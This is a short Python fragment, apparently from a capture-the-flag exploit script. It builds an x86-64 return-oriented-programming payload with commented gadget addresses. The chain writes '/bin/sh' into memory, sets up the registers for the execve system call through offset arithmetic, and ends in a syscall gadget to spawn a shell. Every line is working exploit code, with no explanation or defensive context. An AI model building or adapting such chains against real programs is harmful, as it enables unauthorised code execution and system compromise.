payload = p64(0x401efb)
#0x0000000000401efb: pop rdx; xor eax, eax; pop rsi; pop rbx; pop rbp; ret; 
payload += p64(0x68662f6e69622f)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x403343)
# 0x0000000000403343: pop rax; add eax, 0x5dc03100; ret; 
payload += p64(0xa2815f14)+p64(0x4096fb)
# 0x00000000004096fb: mov qword ptr [rax + 0x44], rdx; xor eax, eax; pop rbp; ret; 
payload += p64(0x0)+p64(0x401efb)
# 0x0000000000401efb: pop rdx; xor eax, eax; pop rsi; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x414b37)
# 0x0000000000414b37: pop rdi; ret; 
payload += p64(0x419058)+p64(0x415434)
# 0x0000000000415434: pop rsi; ret; 
payload += p64(0x0)+p64(0x403343)
# 0x0000000000403343: pop rax; add eax, 0x5dc03100; ret; 
payload += p64(0xa23fcf3b)+p64(0x401e4f)
# 0x0000000000401e4f: syscall; 
payload += b''
